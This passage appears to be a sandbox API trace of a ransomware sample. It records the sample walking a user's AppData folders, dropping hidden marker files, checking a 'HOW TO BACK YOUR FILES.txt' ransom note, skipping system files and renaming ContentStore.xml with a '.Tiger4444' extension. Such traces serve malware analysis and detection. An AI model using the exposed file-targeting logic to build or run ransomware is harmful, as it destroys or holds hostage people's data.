dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.335] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.335] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.335] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x843534b1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x843534b1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x843534b1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.335] FindClose (in: hFindFile=0xc72fc8 | out: hFindFile=0xc72fc8) returned 1 [0052.335] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Signatures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\signatures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.336] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.336] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.336] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.336] CloseHandle (hObject=0x2c8) returned 1 [0052.336] CloseHandle (hObject=0x2ac) returned 1 [0052.336] GetCurrentThreadId () returned 0xfa8 [0052.336] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc916b0 [0052.336] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0052.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78e08 | out: hHeap=0xc50000) returned 1 [0052.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc916a8 | out: hHeap=0xc50000) returned 1 [0052.337] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0052.337] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0052.337] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3" [0052.337] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.338] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.340] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.341] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.341] CloseHandle (hObject=0x2ac) returned 1 [0052.343] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned 67 [0052.343] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.343] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xde511f85, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x843796c1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.343] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.343] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.343] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.343] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.343] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xde511f85, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x843796c1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.343] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.343] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.343] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.343] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.343] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.343] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x843796c1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x843796c1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x843796c1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.343] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.343] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.343] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x43fd72ee, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xde511f85, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ContentStore.xml", cAlternateFileName="CONTEN~1.XML")) returned 1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Tiger4444.exe") returned -1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2=".") returned 1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="..") returned 1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="windows") returned -1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="bootmgr") returned 1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="pagefile.sys") returned -1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="boot") returned 1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ids.txt") returned -1 [0052.343] lstrcmpiW (lpString1="ContentStore.xml", lpString2="NTUSER.DAT") returned -1 [0052.343] lstrcpyW (in: lpString1=0x30aeb30, lpString2="ContentStore.xml" | out: lpString1="ContentStore.xml") returned="ContentStore.xml" [0052.343] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml", dwFileAttributes=0x0) returned 1 [0052.347] lstrlenW (lpString="ContentStore.xml") returned 16 [0052.347] lstrlenW (lpString="Tiger4444") returned 9 [0052.347] lstrcmpiW (lpString1="Store.xml", lpString2="Tiger4444") returned -1 [0052.347] lstrlenW (lpString=".dll") returned 4 [0052.347] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0052.347] lstrlenW (lpString=".lnk") returned 4 [0052.347] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0052.347] lstrlenW (lpString=".ini") returned 4 [0052.347] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0052.347] lstrlenW (lpString=".sys") returned 4 [0052.347] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0052.347] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.347] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.347] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14380020709) returned 1 [0052.347] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=168) returned 1 [0052.347] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0052.347] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0052.347] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x2a4 [0052.349] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0xbe0000 [0052.349] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.349] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0052.349] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.349] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0052.349] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0052.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0052.350] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14380279824) returned 1 [0052.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0052.350] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0052.350] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.350] CloseHandle (hObject=0x2a4) returned 1 [0052.350] CloseHandle (hObject=0x2c8) returned 1 [0052.350] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Tiger4444") returned 94 [0052.350] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.tiger4444"), dwFlags=0x1) returned 1 [0052.350] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x43fd72ee, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xde511f85, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ContentStore.xml", cAlternateFileName="CONTEN~1.XML")) returned 0 [0052.350] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.351] lstrcpyW (in: lpString1=0x30aeb30, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher building blocks\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.352] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.352] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.352] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.352] CloseHandle (hObject=0x2c8) returned 1 [0052.352] CloseHandle (hObject=0x2ac) returned 1 [0052.352] GetCurrentThreadId () returned 0xfa8 [0052.352] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc913f0 [0052.352] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher" [0052.352] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5fd10 | out: hHeap=0xc50000) returned 1 [0052.352] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc913e8 | out: hHeap=0xc50000) returned 1 [0052.352] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher" [0052.352] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\" [0052.352] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3" [0052.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.354] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.356] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.357] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.358] CloseHandle (hObject=0x2ac) returned 1 [0052.358] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher") returned 51 [0052.358] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.358] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eea37, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x422eea37, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x8439f967, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f48 [0052.358] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.358] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.358] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.358] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.358] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eea37, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x422eea37, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x8439f967, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.358] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.358] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.358] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.358] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.358] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.358] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8439f967, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8439f967, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8439f967, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.359] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.359] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.359] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8439f967, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8439f967, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8439f967, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.359] FindClose (in: hFindFile=0xc72f48 | out: hFindFile=0xc72f48) returned 1 [0052.359] lstrcpyW (in: lpString1=0x30aeb10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Publisher\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\publisher\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.359] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.359] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.359] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.359] CloseHandle (hObject=0x2c8) returned 1 [0052.359] CloseHandle (hObject=0x2ac) returned 1 [0052.360] GetCurrentThreadId () returned 0xfa8 [0052.360] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91550 [0052.360] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect" [0052.360] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5f718 | out: hHeap=0xc50000) returned 1 [0052.360] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91548 | out: hHeap=0xc50000) returned 1 [0052.360] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect" [0052.360] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\" [0052.360] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3" [0052.360] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.362] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.364] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.365] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.365] CloseHandle (hObject=0x2ac) returned 1 [0052.366] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect") returned 49 [0052.366] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.366] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b7903de, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x8439f967, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.366] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.366] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.366] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.366] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.366] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, 